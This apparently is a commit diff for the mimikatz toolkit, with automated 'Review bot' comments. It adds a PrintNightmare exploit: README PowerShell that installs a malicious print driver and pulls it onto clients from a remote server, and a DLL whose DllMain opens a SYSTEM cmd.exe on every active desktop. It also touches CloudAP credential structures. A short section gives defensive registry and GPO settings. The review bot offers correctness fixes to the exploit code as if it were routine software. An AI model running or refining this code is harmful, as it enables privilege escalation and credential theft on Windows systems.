} KIWI_CLOUDAP_LOGON_LIST_ENTRY, *PKIWI_CLOUDAP_LOGON_LIST_ENTRY;
typedef struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY_11 {
struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY *Flink;
struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY *Blink;
DWORD unk0;
DWORD unk1;
DWORD unk2;
LUID LocallyUniqueIdentifier;
DWORD unk3;
DWORD unk4;
DWORD unk5;
DWORD unk6;
PKIWI_CLOUDAP_CACHE_LIST_ENTRY cacheEntry;
// ...
} KIWI_CLOUDAP_LOGON_LIST_ENTRY_11, *PKIWI_CLOUDAP_LOGON_LIST_ENTRY_11;
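Review bot: `_KIWI_CLOUDAP_LOGON_LIST_ENTRY_11.Flink` and `.Blink` are typed `struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY *`, the pre-11 layout, so walking a list of `_11` entries through these links yields the wrong type and `LocallyUniqueIdentifier`/`cacheEntry` would be read at the old offsets; make them self-referential: `struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY_11 *Flink;` and `struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY_11 *Blink;`. The cloudap.c hunk in this commit still computes `FIELD_OFFSET(KIWI_CLOUDAP_LOGON_LIST_ENTRY, LocallyUniqueIdentifier)`, so the new struct appears unused for now; a comment saying which build it describes and that it is not yet selected at runtime would stop a reader assuming the Windows 11 layout is already handled.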

166
mimispool/README.md Normal file

@ -0,0 +1,166 @@
## PowerShell commands
### Server
#### install
```
$printerName = 'Kiwi Legit Printer'
$system32 = $env:systemroot + '\system32'
$drivers = $system32 + '\spool\drivers'
$RegStartPrinter = 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\Printers\' + $printerName
Invoke-WebRequest -Uri 'https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip' -OutFile '.\mimikatz_trunk.zip'
Expand-Archive -Path '.\mimikatz_trunk.zip' -DestinationPath '.\mimikatz_trunk'
Copy-Item -Force -Path ($system32 + '\mscms.dll') -Destination ($system32 + '\mimispool.dll')
Copy-Item -Force -Path '.\mimikatz_trunk\x64\mimispool.dll' -Destination ($drivers + '\x64\3\mimispool.dll')
Copy-Item -Force -Path '.\mimikatz_trunk\win32\mimispool.dll' -Destination ($drivers + '\W32X86\3\mimispool.dll')
Add-PrinterDriver -Name 'Generic / Text Only'
Add-Printer -DriverName 'Generic / Text Only' -Name $printerName -PortName 'FILE:' -Shared
New-Item -Path ($RegStartPrinter + '\CopyFiles') | Out-Null
New-Item -Path ($RegStartPrinter + '\CopyFiles\Kiwi') | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Directory' -PropertyType 'String' -Value 'x64\3' | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Files' -PropertyType 'MultiString' -Value ('mimispool.dll') | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Module' -PropertyType 'String' -Value 'mscms.dll' | Out-Null
New-Item -Path ($RegStartPrinter + '\CopyFiles\Litchi') | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Directory' -PropertyType 'String' -Value 'W32X86\3' | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Files' -PropertyType 'MultiString' -Value ('mimispool.dll') | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Module' -PropertyType 'String' -Value 'mscms.dll' | Out-Null
New-Item -Path ($RegStartPrinter + '\CopyFiles\Mango') | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Directory' -PropertyType 'String' -Value $null | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Files' -PropertyType 'MultiString' -Value $null | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Module' -PropertyType 'String' -Value 'mimispool.dll' | Out-Null
```
#### uninstall
```
$printerName = 'Kiwi Legit Printer'
$system32 = $env:systemroot + '\system32'
$drivers = $system32 + '\spool\drivers'
Remove-Printer -Name $printerName
Start-Sleep -Seconds 2
Remove-PrinterDriver -Name 'Generic / Text Only'
Remove-Item -Force -Path ($drivers + '\x64\3\mimispool.dll')
Remove-Item -Force -Path ($drivers + '\W32X86\3\mimispool.dll')
Remove-Item -Force -Path ($system32 + '\mimispool.dll')
```
### Client
#### Any computer with explicit credential to `printnightmare.gentilkiwi.com`
```
$serverName = 'printnightmare.gentilkiwi.com'
$username = 'gentilguest'
$password = 'password'
$printerName = 'Kiwi Legit Printer'
$fullprinterName = '\\' + $serverName + '\' + $printerName
$credential = (New-Object System.Management.Automation.PSCredential($username, (ConvertTo-SecureString -AsPlainText -String $password -Force)))
Remove-PSDrive -Force -Name 'KiwiLegitPrintServer' -ErrorAction SilentlyContinue
Remove-Printer -Name $fullprinterName -ErrorAction SilentlyContinue
New-PSDrive -Name 'KiwiLegitPrintServer' -Root ('\\' + $serverName + '\print$') -PSProvider FileSystem -Credential $credential | Out-Null
Add-Printer -ConnectionName $fullprinterName
$driver = (Get-Printer -Name $fullprinterName).DriverName
Remove-Printer -Name $fullprinterName
Remove-PrinterDriver -Name $driver
Remove-PSDrive -Force -Name 'KiwiLegitPrintServer'
# mimispool still in spool\drivers
```
#### Computer in domain (single sign on with current user to print server)
```
$serverName = 'print.lab.local'
$printerName = 'Kiwi Legit Printer'
$fullprinterName = '\\' + $serverName + '\' + $printerName
Remove-Printer -Name $fullprinterName -ErrorAction SilentlyContinue
Add-Printer -ConnectionName $fullprinterName
$driver = (Get-Printer -Name $fullprinterName).DriverName
Remove-Printer -Name $fullprinterName
Remove-PrinterDriver -Name $driver
# mimispool still in spool\drivers
```
## Protect
_to adapt to your environment_
**Please, do not set `RestrictDriverInstallationToAdministrators` to `0` without these settings**
### Registry
#### `.reg` file
```
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint]
"PackagePointAndPrintOnly"=dword:00000001
"PackagePointAndPrintServerList"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint\ListofServers]
"1"="/your really legit servers or invalid entry !/"
```
#### commands
```
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint" /f /v PackagePointAndPrintServerList /t REG_DWORD /d 1
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint\ListofServers" /f /v 1 /t REG_SZ /d "/your really legit servers or invalid entry !/"
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint" /f /v PackagePointAndPrintOnly /t REG_DWORD /d 1
```
### Registry with real printer servers and allowing non-administrators to install package P&P drivers & printers
#### `.reg` file
```
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint]
"PackagePointAndPrintOnly"=dword:00000001
"PackagePointAndPrintServerList"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint\ListofServers]
"srv1.fqdn"="srv1.fqdn"
"srv2.fqdn"="srv2.fqdn"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint]
"RestrictDriverInstallationToAdministrators"=dword:00000000
```
#### commands
```
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint" /f /v PackagePointAndPrintServerList /t REG_DWORD /d 1
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint\ListofServers" /f /v "srv1.fqdn" /t REG_SZ /d "srv1.fqdn"
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint\ListofServers" /f /v "srv2.fqdn" /t REG_SZ /d "srv2.fqdn"
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint" /f /v PackagePointAndPrintOnly /t REG_DWORD /d 1
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint" /f /v RestrictDriverInstallationToAdministrators /t REG_DWORD /d 0
```
### GPO / Local
In `Computer Configuration`, `Administrative Templates`, `Printers`, enable:
- `Only use Package Point and Print`
- `Package Point and Print - Approved servers`
![image](https://user-images.githubusercontent.com/2307945/129240741-b2a0ba14-6858-4c3f-ad07-07fa55efca29.png)
### GPO with real printer servers and allowing non-administrators to install package P&P drivers & printers
Same configuration as previously - _with real printer server names this time_ - but do not forget to add registry key `RestrictDriverInstallationToAdministrators` to `0`
![image](https://user-images.githubusercontent.com/2307945/133833820-a66b3ffd-a3aa-43a2-a1bf-14581a2a7492.png)


@ -5,48 +5,36 @@
*/
#include "mimispool.h"
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
{
BOOL ret = TRUE;
switch( ul_reason_for_call )
{
case DLL_PROCESS_ATTACH:
kspool(TEXT(__FUNCTION__) L"-PROCESS_ATTACH");
ret = FALSE;
// FALSE avoid to keep library in memory (PrintNightmare < 3/4)
// TRUE will mimic "real" driver/config -- to use/test with /useown on local (remote is not compatible with GetFileVersionInfo*)
break;
UNREFERENCED_PARAMETER(hinstDLL);
UNREFERENCED_PARAMETER(lpReserved);
case DLL_THREAD_ATTACH:
kspool(TEXT(__FUNCTION__) L"-THREAD_ATTACH");
break;
if (fdwReason == DLL_PROCESS_ATTACH)
{
RunProcessForAll(L"cmd.exe");
}
case DLL_THREAD_DETACH:
kspool(TEXT(__FUNCTION__) L"-THREAD_DETACH");
break;
case DLL_PROCESS_DETACH:
kspool(TEXT(__FUNCTION__) L"-PROCESS_DETACH");
break;
}
return ret;
return TRUE;
}
BOOL APIENTRY APIENTRY DrvQueryDriverInfo(DWORD dwMode, PVOID pBuffer, DWORD cbBuf, PDWORD pcbNeeded)
// PrintNightMare 2.x - via config file and/or "real driver"
VOID APIENTRY DrvResetConfigCache()
{
;
}
BOOL APIENTRY DrvQueryDriverInfo(DWORD dwMode, PVOID pBuffer, DWORD cbBuf, PDWORD pcbNeeded)
{
BOOL status = FALSE;
kspool(TEXT(__FUNCTION__));
if ( dwMode == DRVQUERY_USERMODE)
if (dwMode == DRVQUERY_USERMODE)
{
*pcbNeeded = sizeof(DWORD);
if (pBuffer && (cbBuf >= sizeof(DWORD)))
{
status = TRUE;
*(DWORD *)pBuffer = TRUE;
*(DWORD*)pBuffer = TRUE;
}
SetLastError(ERROR_INSUFFICIENT_BUFFER);
}
@ -58,13 +46,11 @@ BOOL APIENTRY APIENTRY DrvQueryDriverInfo(DWORD dwMode, PVOID pBuffer, DWORD cbB
return status;
}
BOOL APIENTRY DrvEnableDriver(ULONG iEngineVersion, ULONG cj, DRVENABLEDATA *pded)
BOOL APIENTRY DrvEnableDriver(ULONG iEngineVersion, ULONG cj, DRVENABLEDATA* pded)
{
BOOL status = FALSE;
kspool(TEXT(__FUNCTION__));
if((iEngineVersion < 0x20000) || (cj < 0x10))
if ((iEngineVersion < 0x20000) || (cj < 0x10))
{
SetLastError(ERROR_BAD_DRIVER_LEVEL);
}
@ -81,50 +67,83 @@ BOOL APIENTRY DrvEnableDriver(ULONG iEngineVersion, ULONG cj, DRVENABLEDATA *pde
VOID APIENTRY DrvDisableDriver()
{
kspool(TEXT(__FUNCTION__));
;
}
VOID APIENTRY DrvResetConfigCache()
{
kspool(TEXT(__FUNCTION__));
}
// PrintNightMare 3.x - via "real packaged driver" - NOT included (need WHQL signature - or pre-approved Authenticode)
void kspool(LPCWSTR szFrom)
// PrintNightMare 4.x - via CopyFiles
DWORD WINAPI GenerateCopyFilePaths(LPCWSTR pszPrinterName, LPCWSTR pszDirectory, LPBYTE pSplClientInfo, DWORD dwLevel, LPWSTR pszSourceDir, LPDWORD pcchSourceDirSize, LPWSTR pszTargetDir, LPDWORD pcchTargetDirSize, DWORD dwFlags)
{
FILE * kspool_logfile;
WCHAR Buffer[256 + 1];
DWORD cbBuffer = ARRAYSIZE(Buffer);
#pragma warning(push)
#pragma warning(disable:4996)
if(kspool_logfile = _wfopen(L"mimispool.log", L"a"))
#pragma warning(pop)
{
klog(kspool_logfile, L"[" PLATFORM L"] [%s] as \'%s\'\n", szFrom, GetUserName(Buffer, &cbBuffer) ? Buffer : L"-");
fclose(kspool_logfile);
}
}
void klog(FILE * logfile, PCWCHAR format, ...)
{
if(logfile)
{
va_list args;
va_start(args, format);
vfwprintf(logfile, format, args);
va_end(args);
fflush(logfile);
}
}
DWORD WINAPI GenerateCopyFilePaths(LPCWSTR pszPrinterName, LPCWSTR pszDirectory, LPBYTE pSplClientInfo, DWORD dwLevel, LPWSTR pszSourceDir, LPDWORD pcchSourceDirSize, LPWSTR pszTargetDir, LPDWORD pcchTargetDirSize, DWORD dwFlags)
{
kspool(TEXT(__FUNCTION__));
UNREFERENCED_PARAMETER(pszPrinterName);
UNREFERENCED_PARAMETER(pszDirectory);
UNREFERENCED_PARAMETER(pSplClientInfo);
UNREFERENCED_PARAMETER(dwLevel);
UNREFERENCED_PARAMETER(pszSourceDir);
UNREFERENCED_PARAMETER(pcchSourceDirSize);
UNREFERENCED_PARAMETER(pszTargetDir);
UNREFERENCED_PARAMETER(pcchTargetDirSize);
UNREFERENCED_PARAMETER(dwFlags);
return ERROR_SUCCESS;
}
BOOL WINAPI SpoolerCopyFileEvent(LPWSTR pszPrinterName, LPWSTR pszKey, DWORD dwCopyFileEvent)
BOOL WINAPI SpoolerCopyFileEvent(LPWSTR pszPrinterName, LPWSTR pszKey, DWORD dwCopyFileEvent)
{
kspool(TEXT(__FUNCTION__));
UNREFERENCED_PARAMETER(pszPrinterName);
UNREFERENCED_PARAMETER(pszKey);
UNREFERENCED_PARAMETER(dwCopyFileEvent);
return TRUE;
}
// Kiwi payload - SYSTEM on all active desktop(s)
BOOL RunProcessForAll(LPWSTR szProcess)
{
BOOL status = FALSE;
STARTUPINFO si = { 0 };
PROCESS_INFORMATION pi = { 0 };
HANDLE hToken, hNewToken;
DWORD i, count;
LPVOID Environment;
PSESSIONIDW sessions;
si.cb = sizeof(si);
si.lpDesktop = L"winsta0\\default";
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken))
{
if (DuplicateTokenEx(hToken, MAXIMUM_ALLOWED, NULL, SecurityIdentification, TokenPrimary, &hNewToken))
{
if (CreateEnvironmentBlock(&Environment, hNewToken, FALSE))
{
if (WinStationEnumerateW(SERVERHANDLE_CURRENT, &sessions, &count)) // cmd as SYSTEM for everyone
{
for (i = 0; i < count; i++)
{
if (sessions[i].State == State_Active)
{
if (SetTokenInformation(hNewToken, TokenSessionId, &sessions[i].SessionId, sizeof(sessions[i].SessionId)))
{
if (CreateProcessAsUser(hNewToken, szProcess, NULL, NULL, NULL, FALSE, CREATE_NEW_CONSOLE | CREATE_UNICODE_ENVIRONMENT, Environment, NULL, &si, &pi))
{
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}
}
}
}
if (sessions)
{
WinStationFreeMemory(sessions);
}
}
DestroyEnvironmentBlock(Environment);
}
CloseHandle(hNewToken);
}
CloseHandle(hToken);
}
return status;
}
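Review bot: `RunProcessForAll` never assigns `status = TRUE`, so it reports failure even when `CreateProcessAsUser` succeeds for every active session; add `status = TRUE;` in the success branch beside the two `CloseHandle` calls, or, if one failed session is meant to fail the call, document that instead. `DllMain` discards the result anyway, and a comment there is worth adding because the spawn now runs under the loader lock at `DLL_PROCESS_ATTACH`, where `CreateProcessAsUser` and `WinStationEnumerateW` can deadlock: `// PoC only: process creation inside DllMain runs under the loader lock`. The `if (sessions)` guard after a successful `WinStationEnumerateW` is redundant but harmless.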


@ -1,10 +1,11 @@
LIBRARY
EXPORTS
; PrintNightMare 2.x - via config file and/or "real driver"
DrvResetConfigCache
DrvQueryDriverInfo
DrvEnableDriver
DrvDisableDriver
DrvResetConfigCache
; PrintNightMare 4.x - via CopyFiles
GenerateCopyFilePaths
SpoolerCopyFileEvent


@ -5,35 +5,75 @@
*/
#pragma once
#include <windows.h>
#include <stdio.h>
#include <userenv.h>
#if defined(_M_X64) || defined(_M_ARM64) // to do, for real one day
#define PLATFORM L"x64"
#elif defined(_M_IX86)
#define PLATFORM L"x86"
#endif
//__pragma(comment(linker, "/export:DllCanUnloadNow=KyXPUI_orig.DllCanUnloadNow,PRIVATE"))
//__pragma(comment(linker, "/export:DllGetClassObject=KyXPUI_orig.DllGetClassObject,PRIVATE"))
typedef LONG_PTR (APIENTRY *PFN)();
#define LOGONID_CURRENT ((ULONG) -1)
#define SERVERHANDLE_CURRENT ((HANDLE) NULL)
#define MAX_THINWIRECACHE 4
#define WINSTATIONNAME_LENGTH 32
#define DOMAIN_LENGTH 17
#define USERNAME_LENGTH 20
typedef WCHAR WINSTATIONNAME[WINSTATIONNAME_LENGTH + 1];
typedef enum _WINSTATIONSTATECLASS {
State_Active = 0,
State_Connected = 1,
State_ConnectQuery = 2,
State_Shadow = 3,
State_Disconnected = 4,
State_Idle = 5,
State_Listen = 6,
State_Reset = 7,
State_Down = 8,
State_Init = 9
} WINSTATIONSTATECLASS;
#pragma warning(push)
#pragma warning(disable:4201)
typedef struct _SESSIONIDW {
union {
ULONG SessionId;
ULONG LogonId;
} DUMMYUNIONNAME;
WINSTATIONNAME WinStationName;
WINSTATIONSTATECLASS State;
} SESSIONIDW, * PSESSIONIDW;
#pragma warning(pop)
BOOLEAN WINAPI WinStationEnumerateW(IN HANDLE hServer, OUT PSESSIONIDW* SessionIds, OUT PULONG Count);
BOOLEAN WINAPI WinStationFreeMemory(IN PVOID Buffer);
typedef LONG_PTR(APIENTRY* PFN)();
typedef struct _DRVFN {
ULONG iFunc;
PFN pfn;
} DRVFN, *PDRVFN;
} DRVFN, * PDRVFN;
typedef struct tagDRVENABLEDATA {
ULONG iDriverVersion;
ULONG c;
DRVFN *pdrvfn;
} DRVENABLEDATA, *PDRVENABLEDATA;
DRVFN* pdrvfn;
} DRVENABLEDATA, * PDRVENABLEDATA;
#define DRVQUERY_USERMODE 1
BOOL APIENTRY APIENTRY DrvQueryDriverInfo(DWORD dwMode, __out_bcount(cbBuf) PVOID pBuffer, DWORD cbBuf, __out_ecount(1) PDWORD pcbNeeded);
__control_entrypoint(DeviceDriver) BOOL APIENTRY DrvEnableDriver(ULONG iEngineVersion, ULONG cj, __in_bcount(cj) DRVENABLEDATA *pded);
VOID APIENTRY DrvDisableDriver();
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved);
void kspool(LPCWSTR szFrom);
void klog(FILE * logfile, PCWCHAR format, ...);
// PrintNightMare 2.x - via config file and/or "real driver"
VOID APIENTRY DrvResetConfigCache();
BOOL APIENTRY DrvQueryDriverInfo(DWORD dwMode, PVOID pBuffer, DWORD cbBuf, PDWORD pcbNeeded);
BOOL APIENTRY DrvEnableDriver(ULONG iEngineVersion, ULONG cj, DRVENABLEDATA* pded);
VOID APIENTRY DrvDisableDriver();
DWORD WINAPI GenerateCopyFilePaths(LPCWSTR pszPrinterName, LPCWSTR pszDirectory, LPBYTE pSplClientInfo, DWORD dwLevel, LPWSTR pszSourceDir, LPDWORD pcchSourceDirSize, LPWSTR pszTargetDir, LPDWORD pcchTargetDirSize, DWORD dwFlags);
BOOL WINAPI SpoolerCopyFileEvent(LPWSTR pszPrinterName, LPWSTR pszKey, DWORD dwCopyFileEvent);
// PrintNightMare 3.x - via "real packaged driver" - NOT included (need WHQL signature - or pre-approved Authenticode)
// PrintNightMare 4.x - via CopyFiles
DWORD WINAPI GenerateCopyFilePaths(LPCWSTR pszPrinterName, LPCWSTR pszDirectory, LPBYTE pSplClientInfo, DWORD dwLevel, LPWSTR pszSourceDir, LPDWORD pcchSourceDirSize, LPWSTR pszTargetDir, LPDWORD pcchTargetDirSize, DWORD dwFlags);
BOOL WINAPI SpoolerCopyFileEvent(LPWSTR pszPrinterName, LPWSTR pszKey, DWORD dwCopyFileEvent);
// Kiwi payload - SYSTEM on all active desktop(s)
BOOL RunProcessForAll(LPWSTR szProcess);
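Review bot: `BOOL RunProcessForAll(LPWSTR szProcess);` takes a writable string although mimispool.c only forwards it as the `lpApplicationName` argument of `CreateProcessAsUser`, and its sole caller passes the literal `L"cmd.exe"`; declare it `BOOL RunProcessForAll(LPCWSTR szProcess);` (and in the definition) so the literal is not typed as mutable. The `WinStationEnumerateW`/`WinStationFreeMemory` prototypes and the `SESSIONIDW` layout are hand-declared with no note that they are undocumented winsta.dll exports resolved through the `winsta.lib` this commit adds to the project; a one-line comment above them, `// undocumented winsta.dll exports (linked via winsta.lib); no SDK header`, would save the next reader a search.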


@ -79,7 +79,7 @@
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<AssemblyDebug>false</AssemblyDebug>
<AdditionalDependencies>advapi32.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalDependencies>advapi32.lib;userenv.lib;winsta.lib;%(AdditionalDependencies)</AdditionalDependencies>
<DataExecutionPrevention>true</DataExecutionPrevention>
<LinkErrorReporting>NoErrorReport</LinkErrorReporting>
<ImageHasSafeExceptionHandlers>false</ImageHasSafeExceptionHandlers>
@ -100,5 +100,6 @@
</ItemGroup>
<ItemGroup>
<None Include="mimispool.def" />
<None Include="README.md" />
</ItemGroup>
</Project>


@ -11,5 +11,6 @@
</ItemGroup>
<ItemGroup>
<None Include="mimispool.def" />
<None Include="README.md" />
</ItemGroup>
</Project>


@ -5,7 +5,7 @@
*/
#include "kull_m_ldap.h"
BOOL kull_m_ldap_getLdapAndRootDN(PCWCHAR system, PCWCHAR nc, PLDAP *ld, PWCHAR *rootDn)
BOOL kull_m_ldap_getLdapAndRootDN(PCWCHAR system, PCWCHAR nc, PLDAP *ld, PWCHAR *rootDn, PSEC_WINNT_AUTH_IDENTITY pIdentity)
{
BOOL status = FALSE;
DWORD dwErr;
@ -14,7 +14,7 @@ BOOL kull_m_ldap_getLdapAndRootDN(PCWCHAR system, PCWCHAR nc, PLDAP *ld, PWCHAR
{
if(*rootDn = kull_m_ldap_getRootDomainNamingContext(nc, *ld))
{
dwErr = ldap_bind_s(*ld, NULL, NULL, LDAP_AUTH_NEGOTIATE);
dwErr = ldap_bind_s(*ld, NULL, (PWCHAR) pIdentity, LDAP_AUTH_NEGOTIATE);
status = (dwErr == LDAP_SUCCESS);
if(!status)
{
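Review bot: The new `ldap_bind_s(*ld, NULL, (PWCHAR) pIdentity, LDAP_AUTH_NEGOTIATE)` hides behind a `PWCHAR` cast that the third argument is a `SEC_WINNT_AUTH_IDENTITY` structure rather than a password string, and nothing states that passing NULL keeps the previous behaviour of binding as the calling security context. A comment on that line would make the contract explicit: `// with LDAP_AUTH_NEGOTIATE the cred argument is a PSEC_WINNT_AUTH_IDENTITY (or NULL for the caller's own context), hence the cast`. The enclosing function body continues outside the hunk.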


@ -9,5 +9,5 @@
#include <WinBer.h>
#include "kull_m_string.h"
BOOL kull_m_ldap_getLdapAndRootDN(PCWCHAR system, PCWCHAR nc, PLDAP *ld, PWCHAR *rootDn);
BOOL kull_m_ldap_getLdapAndRootDN(PCWCHAR system, PCWCHAR nc, PLDAP *ld, PWCHAR *rootDn, PSEC_WINNT_AUTH_IDENTITY pIdentity);
PWCHAR kull_m_ldap_getRootDomainNamingContext(PCWCHAR nc, LDAP *ld);


@ -230,6 +230,7 @@ BOOL kull_m_memory_alloc(IN PKULL_M_MEMORY_ADDRESS Address, IN SIZE_T Lenght, IN
kull_m_kernel_ioctl_handle(Address->hMemory->pHandleDriver->hDriver, IOCTL_MIMIDRV_VM_ALLOC, NULL, (DWORD) Lenght, &ptrAddress, &lenPtr, FALSE);
break;
default:
SetLastError(ERROR_NOT_SUPPORTED);
break;
}
return (Address->address) != NULL;


@ -211,6 +211,4 @@ NET_API_STATUS NET_API_FUNCTION NetWkstaUserEnum(IN LMSTR servername, IN DWORD l
NET_API_STATUS NET_API_FUNCTION NetShareEnum(IN LMSTR servername, IN DWORD level, OUT LPBYTE *bufptr, IN DWORD prefmaxlen, OUT LPDWORD entriesread, OUT LPDWORD totalentries, IN OUT LPDWORD resume_handle);
NET_API_STATUS NET_API_FUNCTION NetStatisticsGet(IN LPWSTR server, IN LPWSTR service, IN DWORD level, IN DWORD options, OUT LPBYTE *bufptr);
NET_API_STATUS NET_API_FUNCTION NetRemoteTOD(IN LPCWSTR UncServerName, OUT PTIME_OF_DAY_INFO *pToD);
NET_API_STATUS NET_API_FUNCTION NetServerGetInfo(IN LPWSTR servername, IN DWORD level, OUT LPBYTE *bufptr);
NET_API_STATUS NET_API_FUNCTION NetShareAdd(IN LMSTR servername, IN DWORD level, IN LPBYTE buf, OUT LPDWORD parm_err);
NET_API_STATUS NET_API_FUNCTION NetConnectionEnum(IN LMSTR servername, LMSTR qualifier, DWORD level, LPBYTE *bufptr, DWORD prefmaxlen, LPDWORD entriesread, LPDWORD totalentries, LPDWORD resume_handle);
NET_API_STATUS NET_API_FUNCTION NetServerGetInfo(IN LPWSTR servername, IN DWORD level, OUT LPBYTE *bufptr);


@ -22,6 +22,8 @@
#include "../kull_m_crypto.h"
#include "../kull_m_process.h"
#define NDR_TSI_20 { {0x8a885d04, 0x1ceb, 0x11c9, { 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60 }}, { 2, 0 }}
typedef DWORD NET_API_STATUS;
typedef UNICODE_STRING RPC_UNICODE_STRING;
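Review bot: NDR_TSI_20 is a bare UUID/version initializer with nothing saying what it is; it is the NDR transfer syntax identifier (8a885d04-1ceb-11c9-9fe8-08002b104860, version 2.0) that an RPC_CLIENT_INTERFACE carries in its TransferSyntax slot, which is exactly where the ms-efsr client interface in this same commit uses it. Suggest a one-line comment above the define: `// NDR transfer syntax (8a885d04-1ceb-11c9-9fe8-08002b104860 v2.0), for RPC_CLIENT_INTERFACE.TransferSyntax`.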


@ -550,7 +550,9 @@ BOOL kull_m_rpc_drsr_MakeAttid(SCHEMA_PREFIX_TABLE *prefixTable, LPCSTR szOid, A
{
oidPrefix.length -= (lastValue < 0x80) ? 1 : 2;
if(status = kull_m_rpc_drsr_MakeAttid_addPrefixToTable(prefixTable, &oidPrefix, &ndx, toAdd))
{
*att |= ndx << 16;
}
else PRINT_ERROR(L"kull_m_rpc_drsr_MakeAttid_addPrefixToTable\n");
kull_m_asn1_freeEnc(oidPrefix.value);
}
@ -559,23 +561,32 @@ BOOL kull_m_rpc_drsr_MakeAttid(SCHEMA_PREFIX_TABLE *prefixTable, LPCSTR szOid, A
return status;
}
ATTRVALBLOCK * kull_m_rpc_drsr_findAttr(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCSTR szOid)
ATTRVALBLOCK * kull_m_rpc_drsr_findAttrNoOID(ATTRBLOCK *attributes, ATTRTYP type)
{
ATTRVALBLOCK *ptr = NULL;
DWORD i;
ATTR *attribut;
for(i = 0; i < attributes->attrCount; i++)
{
attribut = &attributes->pAttr[i];
if(attribut->attrTyp == type)
{
ptr = &attribut->AttrVal;
break;
}
}
return ptr;
}
ATTRVALBLOCK * kull_m_rpc_drsr_findAttr(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCSTR szOid)
{
ATTRVALBLOCK *ptr = NULL;
ATTRTYP type;
if(kull_m_rpc_drsr_MakeAttid(prefixTable, szOid, &type, FALSE))
{
for(i = 0; i < attributes->attrCount; i++)
{
attribut = &attributes->pAttr[i];
if(attribut->attrTyp == type)
{
ptr = &attribut->AttrVal;
break;
}
}
ptr = kull_m_rpc_drsr_findAttrNoOID(attributes, type);
}
else PRINT_ERROR(L"Unable to get an ATTRTYP for %S\n", szOid);
return ptr;
@ -605,6 +616,31 @@ PVOID kull_m_rpc_drsr_findMonoAttr(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *
return ptr;
}
PVOID kull_m_rpc_drsr_findMonoAttrNoOID(ATTRBLOCK *attributes, ATTRTYP type, PVOID data, DWORD *size)
{
PVOID ptr = NULL;
ATTRVALBLOCK *valblock;
if(data)
*(PVOID *)data = NULL;
if(size)
*size = 0;
if(valblock = kull_m_rpc_drsr_findAttrNoOID(attributes, type))
{
if(valblock->valCount == 1)
{
ptr = valblock->pAVal[0].pVal;
if(data)
*(PVOID *)data = ptr;
if(size)
*size = valblock->pAVal[0].valLen;
}
}
return ptr;
}
void kull_m_rpc_drsr_findPrintMonoAttr(LPCWSTR prefix, SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCSTR szOid, BOOL newLine)
{
PVOID ptr;
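Review bot: kull_m_rpc_drsr_findMonoAttrNoOID returns NULL and reports size 0 both when the attribute is absent and when it is present but multi-valued (the `valblock->valCount == 1` test), so a caller cannot tell the two cases apart; the existing findMonoAttr behaves the same way, but the new function has no comment saying so. Suggest documenting it above the definition: `// Returns the single value of attribute 'type', or NULL when the attribute is missing OR carries more than one value; use kull_m_rpc_drsr_findAttrNoOID when the value count matters`. Neither new helper checks `attributes` for NULL before reading attrCount, which matches the original findAttr loop it was extracted from, so a one-line precondition comment (`// attributes must be a valid ATTRBLOCK`) is enough rather than a new check.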


@ -188,6 +188,16 @@ typedef enum {
